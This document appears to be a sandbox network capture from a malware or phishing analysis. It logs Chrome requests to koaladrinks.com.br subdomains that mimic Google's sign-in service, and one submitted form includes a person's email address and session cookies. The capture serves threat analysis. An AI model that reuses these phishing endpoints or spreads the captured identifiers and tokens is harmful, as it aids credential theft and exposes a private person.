                                                      2025-01-10 08:27:53 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:53 UTC12INData Raw: 41 67 65 3a 20 32 32 39 33 32 0d 0a
                                                      Data Ascii: Age: 22932
                                                      2025-01-10 08:27:53 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:53 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:53 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:53 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:53 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:53 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:53 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 34 31 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:41 GMT
                                                      2025-01-10 08:27:53 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 34 31 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:41 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      56192.168.2.949784139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:52 UTC701OUTGET /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&_reqid=112469&rt=c HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:53 UTC33INHTTP/1.1 405 Method Not Allowed
                                                      2025-01-10 08:27:53 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:27:53 UTC13INData Raw: 41 6c 6c 6f 77 3a 20 50 4f 53 54 0d 0a
                                                      Data Ascii: Allow: POST
                                                      2025-01-10 08:27:53 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:53 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:53 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:53 UTC47INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: application/json; charset=utf-8
                                                      2025-01-10 08:27:53 UTC83INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                      2025-01-10 08:27:53 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 33 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:53 GMT
                                                      2025-01-10 08:27:53 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      2025-01-10 08:27:54 UTC196INData Raw: 50 65 72 6d 69 73 73 69 6f 6e 73 2d 50 6f 6c 69 63 79 3a 20 63 68 2d 75 61 2d 61 72 63 68 3d 2a 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 2d 6c 69 73 74 3d 2a 2c 20 63 68 2d 75 61 2d 6d 6f 64 65 6c 3d 2a 2c 20 63 68 2d 75 61 2d 77 6f 77 36 34 3d 2a 2c 20 63 68 2d 75 61 2d 66 6f 72 6d 2d 66 61 63 74 6f 72 73 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 2d 76 65 72 73 69 6f 6e 3d 2a 0d 0a
                                                      Data Ascii: Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      57192.168.2.949785139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:52 UTC640OUTGET /v3/signin/_/AccountsSignInUi/browserinfo?f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&_reqid=12469&rt=j HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:53 UTC33INHTTP/1.1 405 Method Not Allowed
                                                      2025-01-10 08:27:53 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:27:53 UTC13INData Raw: 41 6c 6c 6f 77 3a 20 50 4f 53 54 0d 0a
                                                      Data Ascii: Allow: POST
                                                      2025-01-10 08:27:53 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:53 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:53 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:53 UTC47INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: application/json; charset=utf-8
                                                      2025-01-10 08:27:53 UTC83INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                      2025-01-10 08:27:53 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 33 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:53 GMT
                                                      2025-01-10 08:27:53 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      2025-01-10 08:27:53 UTC196INData Raw: 50 65 72 6d 69 73 73 69 6f 6e 73 2d 50 6f 6c 69 63 79 3a 20 63 68 2d 75 61 2d 61 72 63 68 3d 2a 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 2d 6c 69 73 74 3d 2a 2c 20 63 68 2d 75 61 2d 6d 6f 64 65 6c 3d 2a 2c 20 63 68 2d 75 61 2d 77 6f 77 36 34 3d 2a 2c 20 63 68 2d 75 61 2d 66 6f 72 6d 2d 66 61 63 74 6f 72 73 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 2d 76 65 72 73 69 6f 6e 3d 2a 0d 0a
                                                      Data Ascii: Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      58192.168.2.949786139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:52 UTC1523OUTPOST /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=V1UmUe&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&_reqid=212469&rt=c HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 5236
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      x-goog-ext-278367001-jspb: ["GlifWebSignIn"]
                                                      X-Same-Domain: 1
                                                      x-goog-ext-391502476-jspb: ["S1847760580:1736497656249061",null,null,"AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ"]
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:52 UTC5236OUTData Raw: 66 2e 72 65 71 3d 25 35 42 25 35 42 25 35 42 25 32 32 56 31 55 6d 55 65 25 32 32 25 32 43 25 32 32 25 35 42 6e 75 6c 6c 25 32 43 25 35 43 25 32 32 61 6c 61 69 6e 5f 7a 69 65 67 6c 65 72 25 34 30 7a 69 65 67 6c 65 72 67 72 6f 75 70 2e 63 6f 6d 25 35 43 25 32 32 25 32 43 31 25 32 43 6e 75 6c 6c 25 32 43 6e 75 6c 6c 25 32 43 31 25 32 43 31 25 32 43 6e 75 6c 6c 25 32 43 6e 75 6c 6c 25 32 43 25 35 43 25 32 32 53 31 38 34 37 37 36 30 35 38 30 25 33 41 31 37 33 36 34 39 37 36 35 36 32 34 39 30 36 31 25 35 43 25 32 32 25 32 43 6e 75 6c 6c 25 32 43 6e 75 6c 6c 25 32 43 6e 75 6c 6c 25 32 43 6e 75 6c 6c 25 32 43 6e 75 6c 6c 25 32 43 6e 75 6c 6c 25 32 43 6e 75 6c 6c 25 32 43 6e 75 6c 6c 25 32 43 25 35 42 25 35 44 25 32 43 6e 75 6c 6c 25 32 43 25 35 43 25 32 32 25 35
                                                      Data Ascii: f.req=%5B%5B%5B%22V1UmUe%22%2C%22%5Bnull%2C%5C%22alain_ziegler%40zieglergroup.com%5C%22%2C1%2Cnull%2Cnull%2C1%2C1%2Cnull%2Cnull%2C%5C%22S1847760580%3A1736497656249061%5C%22%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C%5B%5D%2Cnull%2C%5C%22%5
                                                      2025-01-10 08:27:54 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:54 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:27:54 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:54 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:54 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:54 UTC89INData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 73 70 6f 6e 73 65 2e 62 69 6e 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 55 54 46 2d 38 27 27 72 65 73 70 6f 6e 73 65 2e 62 69 6e 0d 0a
                                                      Data Ascii: Content-Disposition: attachment; filename="response.bin"; filename*=UTF-8''response.bin
                                                      2025-01-10 08:27:54 UTC47INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: application/json; charset=utf-8
                                                      2025-01-10 08:27:54 UTC83INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                      2025-01-10 08:27:54 UTC41INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 73 69 74 65 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: same-site
                                                      2025-01-10 08:27:54 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 34 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:54 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      59192.168.2.949788139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:53 UTC573OUTOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Accept: */*
                                                      Access-Control-Request-Method: POST
                                                      Access-Control-Request-Headers: x-goog-authuser
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:55 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:55 UTC40INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a
                                                      Data Ascii: Access-Control-Allow-Credentials: true
                                                      2025-01-10 08:27:55 UTC82INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 58 2d 50 6c 61 79 6c 6f 67 2d 57 65 62 2c 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 2c 6f 72 69 67 69 6e 2c 78 2d 67 6f 6f 67 2d 61 75 74 68 75 73 65 72 0d 0a
                                                      Data Ascii: Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                      2025-01-10 08:27:55 UTC50INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 47 45 54 2c 20 50 4f 53 54 2c 20 4f 50 54 49 4f 4e 53 0d 0a
                                                      Data Ascii: Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      2025-01-10 08:27:55 UTC66INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 0d 0a
                                                      Data Ascii: Access-Control-Allow-Origin: https://ijgbload.koaladrinks.com.br
                                                      2025-01-10 08:27:55 UTC31INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 4d 61 78 2d 41 67 65 3a 20 38 36 34 30 30 0d 0a
                                                      Data Ascii: Access-Control-Max-Age: 86400
                                                      2025-01-10 08:27:55 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:55 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:55 UTC41INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/plain; charset=UTF-8
                                                      2025-01-10 08:27:55 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:55 GMT
                                                      2025-01-10 08:27:55 UTC17INData Raw: 53 65 72 76 65 72 3a 20 50 6c 61 79 6c 6f 67 0d 0a
                                                      Data Ascii: Server: Playlog


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      60192.168.2.949787139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:53 UTC573OUTOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Accept: */*
                                                      Access-Control-Request-Method: POST
                                                      Access-Control-Request-Headers: x-goog-authuser
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:55 UTC17INHTTP/1.1 200 OK
